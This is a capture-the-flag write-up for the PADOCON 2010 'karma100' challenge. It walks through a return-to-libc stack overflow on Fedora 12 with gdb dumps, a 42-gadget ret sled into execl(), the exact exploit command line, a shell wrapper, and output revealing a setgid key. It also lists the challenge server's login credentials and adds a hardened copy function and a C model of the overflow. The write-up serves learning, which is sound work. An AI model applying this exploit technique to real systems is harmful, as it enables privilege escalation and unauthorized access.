After PADOCON 2010 CTF ended, not having solved the system challenge kept bothering me, so I studied it, solved it again, and am leaving this write-up.
Subject : karma100
Type : exploitme
Examiner : padocon
Point : 400
ssh ip : 168.188.130.218
id : karma100
pw : 0x1738a731
First, log in and check the challenge server's environment.
[karma100@padocon ~]$ python -c "import os ; print os.uname()"
('Linux', 'padocon', '2.6.31.5-127.fc12.i686', '#1 SMP Sat Nov 7 21:41:45 EST 2009', 'i686')
[karma100@padocon ~]$ cat /etc/fedora-release
Fedora release 12 (Constantine)
[karma100@padocon ~]$ sysctl -a | grep random
error: permission denied on key 'kernel.cad_pid'
kernel.random.poolsize = 4096
kernel.random.entropy_avail = 163
kernel.random.read_wakeup_threshold = 64
kernel.random.write_wakeup_threshold = 128
kernel.random.boot_id = 2811c7d8-a576-46a4-9e09-b46481d0ad2b
kernel.random.uuid = e51db0f5-58ed-4bb3-8a82-c0166a3bd649
kernel.randomize_va_space = 2
[karma100@padocon ~]$ sysctl -a | grep exec
error: permission denied on key 'kernel.cad_pid'
kernel.exec-shield = 1
kernel.core_pattern = |/usr/libexec/hookCCpp /var/cache/abrt %p %s %u
OS : Fedora 12
Random stack & library : kernel.randomize_va_space = 2, so ASLR is on and the stack address changes from run to run. The technique below never puts a stack address in the payload, and the execl() address read in gdb stays valid outside the debugger because Fedora prelinks glibc at a fixed address.
Non-executable stack : O (kernel.exec-shield = 1)
The challenge code is as follows (the original did not include string.h, so strcpy() was called without a prototype; the bug itself is of course intentional).
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main( int argc, char *argv[] )
{
    char buf[4];               /* 4-byte stack buffer right below the saved ebp  */
    strcpy( buf, argv[1] );    /* copied with no length check: the overflow      */
    return 0;
}
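For comparison, the hardened form of that copy, as an added example (my code, not the challenge's; exploitme is meant to stay vulnerable): the argument is copied only when it fits in the destination together with its NUL, and oversized input is rejected instead of being truncated or written past the end of the buffer. copy_arg is an assumed name.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Bounded replacement for exploitme's strcpy(buf, argv[1]) (added example, not the
 * challenge's code). Copies src into dst only if it fits together with its NUL;
 * otherwise leaves dst untouched, sets errno = E2BIG and returns -1. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t len = 0;
    while (len < dstsz && src[len] != '\0')   /* never scan further than dst can hold */
        len++;
    if (len >= dstsz) {                        /* no room for the terminator: reject */
        errno = E2BIG;
        return -1;
    }
    memcpy(dst, src, len + 1);                 /* len + 1 <= dstsz, so this stays in bounds */
    return 0;
}

int main(int argc, char *argv[])
{
    char buf[4];
    if (argc < 2 || copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "usage: one argument of at most %zu bytes\n", sizeof buf - 1);
        return 1;
    }
    printf("copied \"%s\"\n", buf);
    return 0;
}
```

The check is `len >= dstsz`, not `len > dstsz`: a 4-character argument into a 4-byte buffer is exactly the off-by-one that would put the NUL on the saved ebp.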
Because the stack is non-executable, shellcode placed in buf cannot run, so the attack uses the RTL (return-to-libc) technique: the return address is overwritten so that execution goes into execl() in libc, which then runs a program of our choice that gives us a shell.
Reference : http://x82.inetcop.org/h0me/papers/FC_exploit/FC4_local_overflow.txt
First, find the address of execl().
[karma100@padocon ~]$ gdb -q exploitme
Reading symbols from /home/karma100/exploitme...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x80483ca
(gdb) r
Starting program: /home/karma100/exploitme
Breakpoint 1, 0x080483ca in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.11.1-1.i686
(gdb) x/x execl
0x850330 <execl>: 0x53565755
(gdb)
So execl() is at 0x00850330. Next, find the address of the ret instruction and of argv.
[karma100@padocon ~]$ gdb -q exploitme
Reading symbols from /home/karma100/exploitme...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 <main+0>: push %ebp
0x080483c5 <main+1>: mov %esp,%ebp
0x080483c7 <main+3>: sub $0xc,%esp
0x080483ca <main+6>: mov 0xc(%ebp),%eax
0x080483cd <main+9>: add $0x4,%eax
0x080483d0 <main+12>: mov (%eax),%eax
0x080483d2 <main+14>: mov %eax,0x4(%esp)
0x080483d6 <main+18>: lea -0x4(%ebp),%eax
0x080483d9 <main+21>: mov %eax,(%esp)
0x080483dc <main+24>: call 0x80482f4 <strcpy@plt>
0x080483e1 <main+29>: mov $0x0,%eax
0x080483e6 <main+34>: leave
0x080483e7 <main+35>: ret
End of assembler dump.
(gdb) b *main+29
Breakpoint 1 at 0x80483e1
(gdb) r AAAABBBBCCCC
Starting program: /home/karma100/exploitme AAAABBBBCCCC
Breakpoint 1, 0x080483e1 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.11.1-1.i686
(gdb) x/32wx $ebp
0xbff29438: 0x42424242 0x43434343 0x00000000 0xbff294e4
0xbff29448: 0xbff294f0 0xb78163d0 0x08048310 0xffffffff
0xbff29458: 0x007b0fc4 0x0804822c 0x00000001 0xbff294a0
0xbff29468: 0x007a0365 0x007b1a98 0xb78166a8 0x00924ff4
0xbff29478: 0x00000000 0x00000000 0xbff294b8 0xf20e82f1
0xbff29488: 0xee70f58e 0x00000000 0x00000000 0x00000000
0xbff29498: 0x00000002 0x08048310 0x00000000 0x007a6630
0xbff294a8: 0x007caadb 0x007b0fc4 0x00000002 0x08048310
(gdb) x/32wx 0xbff294e4
0xbff294e4: 0xbff2a885 0xbff2a89e 0x00000000 0xbff2a8ab
0xbff294f4: 0xbff2a8bc 0xbff2a8d4 0xbff2a8e4 0xbff2a8ef
0xbff29504: 0xbff2a8fd 0xbff2a91d 0xbff2a938 0xbff2a94b
0xbff29514: 0xbff2a959 0xbff2ae40 0xbff2ae4c 0xbff2ae8e
0xbff29524: 0xbff2aeac 0xbff2aebb 0xbff2aece 0xbff2aedf
0xbff29534: 0xbff2aef8 0xbff2af01 0xbff2af18 0xbff2af4b
0xbff29544: 0xbff2af5f 0xbff2af67 0xbff2af78 0xbff2afac
0xbff29554: 0xbff2afce 0x00000000 0x00000020 0x00781414
(gdb) x/s 0xbff2a885
0xbff2a885: "/home/karma100/exploitme"
(gdb) x/s 0xbff2a89e
0xbff2a89e: "AAAABBBBCCCC"
(gdb) x/32wx $esp
0xbff2942c: 0xbff29434 0xbff2a89e 0x41414141 0x42424242
0xbff2943c: 0x43434343 0x00000000 0xbff294e4 0xbff294f0
0xbff2944c: 0xb78163d0 0x08048310 0xffffffff 0x007b0fc4
0xbff2945c: 0x0804822c 0x00000001 0xbff294a0 0x007a0365
0xbff2946c: 0x007b1a98 0xb78166a8 0x00924ff4 0x00000000
0xbff2947c: 0x00000000 0xbff294b8 0xf20e82f1 0xee70f58e
0xbff2948c: 0x00000000 0x00000000 0x00000000 0x00000002
0xbff2949c: 0x08048310 0x00000000 0x007a6630 0x007caadb
So the ret instruction, main's own `ret` at main+35 that will serve as the sled gadget, is at 0x080483e7, and argv is at 0xbff294e4 (the value at ebp+0xc, which the disassembly loads as argv). The dump also shows where the copy went: buf at 0xbff29434 (ebp-4) holds AAAA, the saved ebp at 0xbff29438 holds BBBB, the return-address slot at 0xbff2943c holds CCCC, and strcpy()'s terminator zeroed the low byte of argc at 0xbff29440.
Now let's calculate how many rets are needed to reach execl(): every ret pops 4 bytes, so chaining (argv - return slot) / 4 of them walks esp from the return-address slot up to the argv array, which is where execl()'s address will be placed.
[karma100@padocon ~]$ python -c "print (0xbff294e4-0xbff2943c)/4"
42
A total of 42 rets are needed. Next, write the program that execl() will run; its path is what gets passed as execl()'s argument.
[karma100@padocon ~]$ cd tmp
[karma100@padocon tmp]$ mkdir byjjoon
[karma100@padocon tmp]$ cd byjjoon
[karma100@padocon byjjoon]$ cat > shell.c
#include <unistd.h>

/* Re-assert the effective uid/gid inherited from the setgid (boom300) exploitme
 * binary before exec'ing the shell; bash would otherwise reset them to the real ids. */
int main(void)
{
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    execl("/bin/sh", "sh", (char *)0);   /* the argument list must end with a NULL pointer */
    return 1;                            /* only reached if execl() failed */
}
[karma100@padocon byjjoon]$ gcc -o shell shell.c
[karma100@padocon byjjoon]$ ls -al
total 20
drwxrwxr-x. 2 karma100 karma100 4096 2010-02-22 09:09 .
drwx-wx---. 30 root karma100 4096 2010-02-22 09:08 ..
-rwxrwxr-x. 1 karma100 karma100 5338 2010-02-22 09:09 shell
-rw-rw-r--. 1 karma100 karma100 130 2010-02-22 09:09 shell.c
[karma100@padocon byjjoon]$
Now let's run the attack. The payload is as follows.
[AAAA (buf)][BBBB (saved ebp)] + [ret gadget 0x080483e7 * 42] + [execl() 0x00850330] + [' ./shell'] + [' ./shell']
How it works: bash's backtick substitution word-splits python's output on the spaces, so exploitme receives three arguments: argv[1] is the 'AAAABBBB' + sled + execl() part, and argv[2] and argv[3] are both './shell'. strcpy() copies argv[1] over buf, the saved ebp, the return address and everything up to the argv array: the 42 ret gadgets fill the slots from the return address (0xbff2943c) to just below the array, and the execl() address lands exactly on argv[0] (0xbff294e4). When main returns, each ret pops one gadget address and jumps to the next, until the 43rd pop fetches 0x00850330 and enters execl() with esp pointing at argv[1]. From execl()'s point of view that slot is its return address, argv[2] is the path ('./shell'), argv[3] is the first argument, and the NULL that terminates argv ends the list: execl("./shell", "./shell", NULL).
Two things to note. First, 0x00850330 contains a 0x00 byte; bash drops it from the substitution output, so argv[1] actually ends after '\x30\x03\x85' and strcpy()'s own terminating NUL supplies the missing byte, which is why the address has to be the last thing in the string. Second, no stack address appears in the payload, so stack ASLR does not matter; what does matter is the distance from the return-address slot to argv[], which was measured with argc = 2 and a 12-byte argument. The whole stack shifts with the argument sizes, but that distance only changes through the 16-byte alignment the startup code applies, so if the sled misses, re-measure it in gdb with an argument of the real length.
[karma100@padocon byjjoon]$ ../../exploitme `python -c "print 'AAAABBBB' + '\xe7\x83\x04\x08'*42 + '\x30\x03\x85\x00' + ' ./shell' + ' ./shell'"`
sh-4.0$ id
uid=505(karma100) gid=506(boom300) groups=505(karma100) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.0$ cat ../../../boom300/key
GlueMelol
sh-4.0$
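To make the offset arithmetic and the sled concrete, here is an added example (my code, not the author's or the x82 paper's): a C model of the stack between buf and argv[], using the addresses measured in gdb above. It builds argv[1] the way bash delivers it (the 0x00 byte of the execl() address dropped), applies the copy the way strcpy() does including the terminator, then executes main's ret and the sled pop by pop and reports the frame execl() is entered with. The pointer values used for argv[2] and argv[3] (0xbff2ab00, 0xbff2ab08) are constructed; only their positions in the array matter.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses measured in gdb on this page. */
#define BUF_ADDR    0xbff29434u   /* buf = ebp - 4                           */
#define RET_SLOT    0xbff2943cu   /* main's return address, ebp + 4          */
#define ARGV_ARRAY  0xbff294e4u   /* the argv[] array, read from ebp + 0xc   */
#define RET_GADGET  0x080483e7u   /* main+35: the `ret` used as sled gadget  */
#define EXECL_ADDR  0x00850330u   /* execl() in the prelinked libc           */

/* argv[] entries: argv[0]/argv[1] as seen in gdb, argv[2]/argv[3] constructed. */
#define ARGV0_PTR   0xbff2a885u
#define ARGV1_PTR   0xbff2a89eu
#define ARGV2_PTR   0xbff2ab00u   /* constructed: "./shell" */
#define ARGV3_PTR   0xbff2ab08u   /* constructed: "./shell" */

#define STACK_BYTES 256
#define PAYLOAD_MAX 256

struct execl_frame {
    uint32_t target;   /* where the last ret jumped                      */
    uint32_t retaddr;  /* [esp]    : what execl() sees as return address */
    uint32_t path;     /* [esp+4]  : execl()'s path argument             */
    uint32_t arg0;     /* [esp+8]  : execl()'s argv[0] argument          */
    uint32_t term;     /* [esp+12] : must be 0 to terminate the list     */
};

static void put32(uint8_t *p, uint32_t v)     /* little-endian store */
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}
static uint32_t get32(const uint8_t *p)       /* little-endian load */
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Each `ret` pops 4 bytes, so this many gadgets walk esp from the return slot to argv[]. */
unsigned sled_count(uint32_t ret_slot, uint32_t argv_array)
{
    return (argv_array - ret_slot) / 4;
}

/* argv[1] as bash hands it to exploitme: command substitution drops the 0x00 byte of
 * 0x00850330, so the string ends after 0x30 0x03 0x85 and strcpy()'s NUL completes it. */
size_t build_payload(uint8_t *out, unsigned sled)
{
    size_t n = 0;
    memcpy(out + n, "AAAABBBB", 8); n += 8;                  /* buf + saved ebp */
    for (unsigned i = 0; i < sled; i++) { put32(out + n, RET_GADGET); n += 4; }
    put32(out + n, EXECL_ADDR); n += 3;                      /* 4th byte does not survive the shell */
    return n;
}

/* Model the stack from buf upward, overwrite it as strcpy(buf, argv[1]) would, then run
 * main's `ret` and the sled one pop at a time and report the frame execl() is entered with. */
struct execl_frame run_overflow(const uint8_t *payload, size_t len)
{
    struct execl_frame f = {0, 0, 0, 0, 0};
    uint8_t stack[STACK_BYTES];
    uint32_t av = ARGV_ARRAY - BUF_ADDR;                     /* argv[] offset from buf: 176 */

    if (len + 1 > sizeof stack || av + 20 > sizeof stack) return f;
    memset(stack, 0xcc, sizeof stack);                       /* frame contents we don't care about */
    put32(stack + av + 0,  ARGV0_PTR);
    put32(stack + av + 4,  ARGV1_PTR);
    put32(stack + av + 8,  ARGV2_PTR);
    put32(stack + av + 12, ARGV3_PTR);
    put32(stack + av + 16, 0);                               /* argv[argc] == NULL */

    memcpy(stack, payload, len);                             /* the overflow ...        */
    stack[len] = 0;                                          /* ... and its terminator  */

    uint32_t esp = RET_SLOT - BUF_ADDR;                      /* `leave` left esp at the ret slot */
    uint32_t eip;
    do {                                                     /* ret: eip = pop */
        eip = get32(stack + esp);
        esp += 4;
    } while (eip == RET_GADGET && esp + 16 <= sizeof stack);

    f.target  = eip;
    f.retaddr = get32(stack + esp);
    f.path    = get32(stack + esp + 4);
    f.arg0    = get32(stack + esp + 8);
    f.term    = get32(stack + esp + 12);
    return f;
}

int main(void)
{
    uint8_t payload[PAYLOAD_MAX];
    unsigned sled = sled_count(RET_SLOT, ARGV_ARRAY);
    size_t len = build_payload(payload, sled);
    struct execl_frame f = run_overflow(payload, len);

    printf("sled: %u rets, argv[1] is %zu bytes, last ret jumps to 0x%08lx\n",
           sled, len, (unsigned long)f.target);
    printf("execl() frame: ret=0x%08lx path=0x%08lx arg0=0x%08lx term=0x%lx\n",
           (unsigned long)f.retaddr, (unsigned long)f.path,
           (unsigned long)f.arg0, (unsigned long)f.term);
    return (f.target == EXECL_ADDR && f.term == 0) ? 0 : 1;
}
```

The model is deliberately relative: everything is an offset from buf, which is why it does not need the randomized stack base. If you change the number of arguments or their lengths on the real target and the shell does not appear, re-measure ARGV_ARRAY and RET_SLOT in gdb with that exact command line before adjusting the sled.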